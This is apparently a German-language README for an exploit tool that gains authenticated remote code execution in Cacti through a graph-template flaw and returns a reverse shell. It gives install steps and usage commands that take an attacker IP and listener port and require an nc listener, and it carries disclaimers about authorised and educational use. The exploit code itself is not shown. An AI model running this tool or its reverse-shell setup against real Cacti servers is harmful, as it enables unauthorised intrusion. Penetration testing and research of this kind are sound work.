
Authentifizierter Remote-Code-Execution-Exploit für die Cacti-Graph-Template-Schwachstelle, mit Reverse-Shell-Payload und Proxy-Unterstützung für autorisierte Penetrationstests.
Wichtig – zuerst lesen:
Dieses Repository undexploit.pywerden nur für Bildungs- und Forschungszwecke bereitgestellt. Verwenden Sie diesen Code nicht gegen Systeme, Netzwerke oder Dienste, für die Sie keine ausdrückliche, schriftliche Genehmigung haben. Unbefugter Zugriff auf Computersysteme ist illegal und unethisch. Durch die Verwendung dieses Codes stimmen Sie zu, geltende Gesetze und institutionelle Richtlinien einzuhalten.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Stellen Sie sicher, dass ein nc-Listener läuft, bevor Sie das Skript ausführen. Führen Sie das Skript ohne Proxy aus, außer zum Debugging:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Letzte Erinnerung: Dieses Skript und die README dienen nur Bildungszwecken. Verwenden Sie diese Tools niemals, um unbefugt auf Systeme zuzugreifen.